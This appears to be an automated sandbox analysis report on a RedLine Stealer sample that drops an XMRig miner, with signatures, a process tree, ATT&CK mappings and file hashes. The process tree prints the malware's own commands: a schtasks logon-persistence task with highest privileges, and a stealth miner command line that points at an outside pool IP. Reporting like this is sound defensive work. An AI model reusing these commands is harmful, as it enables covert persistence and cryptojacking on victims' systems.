Analysis

  • max time kernel
    151s
  • max time network
    141s
  • platform
    windows7_x64
  • resource
    win7-en-20211014
  • submitted
    04-12-2021 03:27

General

  • Target

    9a4c62c0ff98de600bbbbe41bb996f0577224b0461c6c.exe

  • Size

    1.5MB

  • MD5

    dec22ccebba8916f15efac9fa0d19986

  • SHA1

    5dab7a780b575aadb6eec991893f4982702cd079

  • SHA256

    9a4c62c0ff98de600bbbbe41bb996f0577224b0461c6c30054a9df1751cbb474

  • SHA512

    6823bd910dc905279192f9cfbd89aa1241113875e51f4955e3a6d31ffadb1dbf804c59d383a46891a1ad1302ce65a67d58ffb555632b1966169ca1f9c2b0dd88

Malware Config

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • XMRig Miner Payload 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 33 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9a4c62c0ff98de600bbbbe41bb996f0577224b0461c6c.exe
    "C:\Users\Admin\AppData\Local\Temp\9a4c62c0ff98de600bbbbe41bb996f0577224b0461c6c.exe"
    1⤵
    • Checks BIOS information in registry
    • Loads dropped DLL
    • Checks whether UAC is enabled
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1692
    • C:\Users\Admin\AppData\Local\Temp\hfhu6hrdf.exe
      "C:\Users\Admin\AppData\Local\Temp\hfhu6hrdf.exe"
      2⤵
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1972
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:832
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
          4⤵
          • Creates scheduled task(s)
          PID:980
      • C:\Users\Admin\AppData\Local\Temp\services64.exe
        "C:\Users\Admin\AppData\Local\Temp\services64.exe"
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:432
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1940
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
            5⤵
            • Creates scheduled task(s)
            PID:1892
        • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
          "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
          4⤵
          • Executes dropped EXE
          PID:1120
        • C:\Windows\System32\notepad.exe
          C:\Windows/System32\notepad.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=146.59.188.176:3333 --user=null --pass=H-M --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=100 --nicehash --tls --cinit-stealth
          4⤵
          • Checks BIOS information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:968

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Virtualization/Sandbox Evasion

1
T1497

Credential Access

Credentials in Files

2
T1081

Discovery

Query Registry

3
T1012

Virtualization/Sandbox Evasion

1
T1497

System Information Discovery

3
T1082

Collection

Data from Local System

2
T1005

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\hfhu6hrdf.exe
    MD5

    17d3b798d42fb239455d634d5601917d

    SHA1

    6319f855826fa2c726f222b920c8c1b721b5dadc

    SHA256

    e0b515cd5e9a64fa26a259b35fe440f0f13eca6d7cb12454a19c6a40905454a0

    SHA512

    7e380e5440928f504e1c4c1b3a1eb19710f6f76df8b267890d59bb657a9bc4dfeb854df020af5afc6ada97ac5d6317e940ef90a4180a1d84bc68936a1968888a

  • C:\Users\Admin\AppData\Local\Temp\hfhu6hrdf.exe
    MD5

    17d3b798d42fb239455d634d5601917d

    SHA1

    6319f855826fa2c726f222b920c8c1b721b5dadc

    SHA256

    e0b515cd5e9a64fa26a259b35fe440f0f13eca6d7cb12454a19c6a40905454a0

    SHA512

    7e380e5440928f504e1c4c1b3a1eb19710f6f76df8b267890d59bb657a9bc4dfeb854df020af5afc6ada97ac5d6317e940ef90a4180a1d84bc68936a1968888a

  • C:\Users\Admin\AppData\Local\Temp\services64.exe
    MD5

    17d3b798d42fb239455d634d5601917d

    SHA1

    6319f855826fa2c726f222b920c8c1b721b5dadc

    SHA256

    e0b515cd5e9a64fa26a259b35fe440f0f13eca6d7cb12454a19c6a40905454a0

    SHA512

    7e380e5440928f504e1c4c1b3a1eb19710f6f76df8b267890d59bb657a9bc4dfeb854df020af5afc6ada97ac5d6317e940ef90a4180a1d84bc68936a1968888a

  • C:\Users\Admin\AppData\Local\Temp\services64.exe
    MD5

    17d3b798d42fb239455d634d5601917d

    SHA1

    6319f855826fa2c726f222b920c8c1b721b5dadc

    SHA256

    e0b515cd5e9a64fa26a259b35fe440f0f13eca6d7cb12454a19c6a40905454a0

    SHA512

    7e380e5440928f504e1c4c1b3a1eb19710f6f76df8b267890d59bb657a9bc4dfeb854df020af5afc6ada97ac5d6317e940ef90a4180a1d84bc68936a1968888a

  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    1ae65b09c29718126e6ad166296e2ce8

    SHA1

    f6fdc20a0731eda7b44520f7a3702617243665a0

    SHA256

    d5e798cb116f2253c4769fa97de3ae107ea5206b15a0ce68a7e1482eb20649e0

    SHA512

    4e4054d5e13a9be6dd51de9d888c79cc851519fc67e7306fe628928ec62dd5fdebb0215307248110798c9e4f383af5ba591c8207c5e9b796eb9171292fe1958f

  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    1ae65b09c29718126e6ad166296e2ce8

    SHA1

    f6fdc20a0731eda7b44520f7a3702617243665a0

    SHA256

    d5e798cb116f2253c4769fa97de3ae107ea5206b15a0ce68a7e1482eb20649e0

    SHA512

    4e4054d5e13a9be6dd51de9d888c79cc851519fc67e7306fe628928ec62dd5fdebb0215307248110798c9e4f383af5ba591c8207c5e9b796eb9171292fe1958f

  • \Users\Admin\AppData\Local\Temp\hfhu6hrdf.exe
    MD5

    17d3b798d42fb239455d634d5601917d

    SHA1

    6319f855826fa2c726f222b920c8c1b721b5dadc

    SHA256

    e0b515cd5e9a64fa26a259b35fe440f0f13eca6d7cb12454a19c6a40905454a0

    SHA512

    7e380e5440928f504e1c4c1b3a1eb19710f6f76df8b267890d59bb657a9bc4dfeb854df020af5afc6ada97ac5d6317e940ef90a4180a1d84bc68936a1968888a

  • \Users\Admin\AppData\Local\Temp\services64.exe
    MD5

    17d3b798d42fb239455d634d5601917d

    SHA1

    6319f855826fa2c726f222b920c8c1b721b5dadc

    SHA256

    e0b515cd5e9a64fa26a259b35fe440f0f13eca6d7cb12454a19c6a40905454a0

    SHA512

    7e380e5440928f504e1c4c1b3a1eb19710f6f76df8b267890d59bb657a9bc4dfeb854df020af5afc6ada97ac5d6317e940ef90a4180a1d84bc68936a1968888a

  • \Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    1ae65b09c29718126e6ad166296e2ce8

    SHA1

    f6fdc20a0731eda7b44520f7a3702617243665a0

    SHA256

    d5e798cb116f2253c4769fa97de3ae107ea5206b15a0ce68a7e1482eb20649e0

    SHA512

    4e4054d5e13a9be6dd51de9d888c79cc851519fc67e7306fe628928ec62dd5fdebb0215307248110798c9e4f383af5ba591c8207c5e9b796eb9171292fe1958f

  • memory/432-119-0x0000000000000000-mapping.dmp
  • memory/432-133-0x0000000023C60000-0x0000000023C62000-memory.dmp
    Filesize

    8KB

  • memory/432-121-0x000000013FB30000-0x000000013FB31000-memory.dmp
    Filesize

    4KB

  • memory/832-115-0x0000000000000000-mapping.dmp
  • memory/968-142-0x0000000140000000-0x0000000140999000-memory.dmp
    Filesize

    9.6MB

  • memory/968-145-0x000007FEFC061000-0x000007FEFC063000-memory.dmp
    Filesize

    8KB

  • memory/968-135-0x0000000140000000-0x0000000140999000-memory.dmp
    Filesize

    9.6MB

  • memory/968-149-0x0000000001F50000-0x0000000001F70000-memory.dmp
    Filesize

    128KB

  • memory/968-137-0x0000000140000000-0x0000000140999000-memory.dmp
    Filesize

    9.6MB

  • memory/968-138-0x0000000140000000-0x0000000140999000-memory.dmp
    Filesize

    9.6MB

  • memory/968-148-0x0000000001EA0000-0x0000000001EC0000-memory.dmp
    Filesize

    128KB

  • memory/968-139-0x0000000140000000-0x0000000140999000-memory.dmp
    Filesize

    9.6MB

  • memory/968-140-0x0000000140000000-0x0000000140999000-memory.dmp
    Filesize

    9.6MB

  • memory/968-147-0x0000000140000000-0x0000000140999000-memory.dmp
    Filesize

    9.6MB

  • memory/968-141-0x0000000140000000-0x0000000140999000-memory.dmp
    Filesize

    9.6MB

  • memory/968-143-0x0000000140000000-0x0000000140999000-memory.dmp
    Filesize

    9.6MB

  • memory/968-144-0x0000000140976000-mapping.dmp
  • memory/968-136-0x0000000140000000-0x0000000140999000-memory.dmp
    Filesize

    9.6MB

  • memory/968-146-0x0000000001CB0000-0x0000000001CD0000-memory.dmp
    Filesize

    128KB

  • memory/980-116-0x0000000000000000-mapping.dmp
  • memory/1120-127-0x0000000000000000-mapping.dmp
  • memory/1120-130-0x000000013FBE0000-0x000000013FBE1000-memory.dmp
    Filesize

    4KB

  • memory/1120-134-0x000000001AD30000-0x000000001AD32000-memory.dmp
    Filesize

    8KB

  • memory/1692-64-0x0000000002830000-0x0000000002831000-memory.dmp
    Filesize

    4KB

  • memory/1692-81-0x00000000026F0000-0x00000000026F1000-memory.dmp
    Filesize

    4KB

  • memory/1692-74-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1692-73-0x00000000008A0000-0x00000000008A1000-memory.dmp
    Filesize

    4KB

  • memory/1692-72-0x00000000021B0000-0x00000000021B1000-memory.dmp
    Filesize

    4KB

  • memory/1692-71-0x00000000021A0000-0x00000000021A1000-memory.dmp
    Filesize

    4KB

  • memory/1692-70-0x00000000034C0000-0x00000000034C1000-memory.dmp
    Filesize

    4KB

  • memory/1692-69-0x00000000034C0000-0x00000000034C1000-memory.dmp
    Filesize

    4KB

  • memory/1692-68-0x00000000034C0000-0x00000000034C1000-memory.dmp
    Filesize

    4KB

  • memory/1692-67-0x00000000034C0000-0x00000000034C1000-memory.dmp
    Filesize

    4KB

  • memory/1692-66-0x00000000034D0000-0x00000000034D1000-memory.dmp
    Filesize

    4KB

  • memory/1692-65-0x0000000002800000-0x0000000002801000-memory.dmp
    Filesize

    4KB

  • memory/1692-55-0x0000000002020000-0x0000000002080000-memory.dmp
    Filesize

    384KB

  • memory/1692-62-0x00000000027D0000-0x00000000027D1000-memory.dmp
    Filesize

    4KB

  • memory/1692-61-0x0000000002810000-0x0000000002811000-memory.dmp
    Filesize

    4KB

  • memory/1692-60-0x00000000027A0000-0x00000000027A1000-memory.dmp
    Filesize

    4KB

  • memory/1692-59-0x00000000027F0000-0x00000000027F1000-memory.dmp
    Filesize

    4KB

  • memory/1692-58-0x00000000027E0000-0x00000000027E1000-memory.dmp
    Filesize

    4KB

  • memory/1692-105-0x0000000000400000-0x0000000000402000-memory.dmp
    Filesize

    8KB

  • memory/1692-107-0x0000000005B80000-0x0000000005B81000-memory.dmp
    Filesize

    4KB

  • memory/1692-76-0x00000000021F0000-0x00000000021F1000-memory.dmp
    Filesize

    4KB

  • memory/1692-56-0x0000000076081000-0x0000000076083000-memory.dmp
    Filesize

    8KB

  • memory/1692-77-0x00000000034C0000-0x00000000034C1000-memory.dmp
    Filesize

    4KB

  • memory/1692-57-0x0000000000400000-0x00000000007FA000-memory.dmp
    Filesize

    4.0MB

  • memory/1692-63-0x00000000027C0000-0x00000000027C1000-memory.dmp
    Filesize

    4KB

  • memory/1692-97-0x0000000002870000-0x0000000002871000-memory.dmp
    Filesize

    4KB

  • memory/1692-78-0x00000000034C0000-0x00000000034C1000-memory.dmp
    Filesize

    4KB

  • memory/1692-79-0x0000000002730000-0x0000000002731000-memory.dmp
    Filesize

    4KB

  • memory/1692-80-0x0000000002740000-0x0000000002741000-memory.dmp
    Filesize

    4KB

  • memory/1692-75-0x00000000021D0000-0x00000000021D1000-memory.dmp
    Filesize

    4KB

  • memory/1692-82-0x0000000002760000-0x0000000002761000-memory.dmp
    Filesize

    4KB

  • memory/1692-83-0x0000000002720000-0x0000000002721000-memory.dmp
    Filesize

    4KB

  • memory/1692-84-0x0000000002710000-0x0000000002711000-memory.dmp
    Filesize

    4KB

  • memory/1692-103-0x0000000000890000-0x0000000000891000-memory.dmp
    Filesize

    4KB

  • memory/1692-102-0x0000000002200000-0x0000000002201000-memory.dmp
    Filesize

    4KB

  • memory/1692-85-0x0000000002780000-0x0000000002781000-memory.dmp
    Filesize

    4KB

  • memory/1692-86-0x00000000034C0000-0x00000000034C1000-memory.dmp
    Filesize

    4KB

  • memory/1692-87-0x00000000034C0000-0x00000000034C1000-memory.dmp
    Filesize

    4KB

  • memory/1692-88-0x00000000034C0000-0x00000000034C1000-memory.dmp
    Filesize

    4KB

  • memory/1692-89-0x00000000034C0000-0x00000000034C1000-memory.dmp
    Filesize

    4KB

  • memory/1692-90-0x00000000034C0000-0x00000000034C1000-memory.dmp
    Filesize

    4KB

  • memory/1692-91-0x0000000000890000-0x0000000000891000-memory.dmp
    Filesize

    4KB

  • memory/1692-92-0x0000000002890000-0x0000000002891000-memory.dmp
    Filesize

    4KB

  • memory/1692-93-0x00000000028A0000-0x00000000028A1000-memory.dmp
    Filesize

    4KB

  • memory/1692-94-0x0000000002850000-0x0000000002851000-memory.dmp
    Filesize

    4KB

  • memory/1692-95-0x00000000028C0000-0x00000000028C1000-memory.dmp
    Filesize

    4KB

  • memory/1692-96-0x0000000002880000-0x0000000002881000-memory.dmp
    Filesize

    4KB

  • memory/1692-98-0x00000000028E0000-0x00000000028E1000-memory.dmp
    Filesize

    4KB

  • memory/1692-99-0x0000000000890000-0x0000000000891000-memory.dmp
    Filesize

    4KB

  • memory/1692-100-0x0000000000890000-0x0000000000891000-memory.dmp
    Filesize

    4KB

  • memory/1692-104-0x0000000000890000-0x0000000000891000-memory.dmp
    Filesize

    4KB

  • memory/1692-101-0x00000000028D0000-0x00000000028D1000-memory.dmp
    Filesize

    4KB

  • memory/1892-125-0x0000000000000000-mapping.dmp
  • memory/1940-124-0x0000000000000000-mapping.dmp
  • memory/1972-114-0x0000000002100000-0x0000000002102000-memory.dmp
    Filesize

    8KB

  • memory/1972-113-0x00000000237E0000-0x0000000023AB7000-memory.dmp
    Filesize

    2.8MB

  • memory/1972-111-0x000000013FDA0000-0x000000013FDA1000-memory.dmp
    Filesize

    4KB

  • memory/1972-109-0x0000000000000000-mapping.dmp